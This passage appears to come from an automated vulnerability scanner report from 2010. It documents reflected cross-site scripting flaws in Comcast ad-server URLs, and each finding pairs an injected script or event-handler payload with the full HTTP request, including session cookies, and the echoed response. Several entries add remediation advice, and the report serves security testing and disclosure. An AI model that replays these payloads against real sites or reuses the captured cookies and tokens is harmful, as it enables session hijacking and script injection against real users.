s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 780 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69b0"><script>alert(1)</script>b11efa66307 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 779 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1313"><script>alert(1)</script>84290a6437b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 777 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22ec"><script>alert(1)</script>bf352f0d2a0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 781 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf was submitted in the REST URL parameter 9. This input was echoed as aae3c"><img src=a onerror=alert(1)>24f9f614caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 783 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ace4"><script>alert(1)</script>ea98919b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?8ace4"><script>alert(1)</script>ea98919b1f9=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 782 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0a72"><script>alert(1)</script>f7f7069159a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1443 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... <IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/628065419/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14935"%3be7e5252438c was submitted in the REST URL parameter 4. This input was echoed as 14935";e7e5252438c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net14935"%3be7e5252438c/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1395 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net14935";e7e5252438c/network/202236386/L17/1951116135/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002"; var TFSMFlash_SWFCLICKVARIABLE="?clickTAG=" ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d17"><script>alert(1)</script>cff26d6cff1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1445 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... <IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1983654328/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171b6"%3b637bcacedc8 was submitted in the REST URL parameter 5. This input was echoed as 171b6";637bcacedc8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network171b6"%3b637bcacedc8/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1395 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network171b6";637bcacedc8/202236386/L17/1178633365/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002"; var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFla ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e77"><script>alert(1)</script>bef770f05c3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1443 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... <IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/964926435/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e88e"-alert(1)-"53982542345 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1413 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/196666583/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002"; var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a574f"><script>alert(1)</script>34133688c6e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1447 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... <IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/L/856912946/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9a"-alert(1)-"e60a8a7472b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
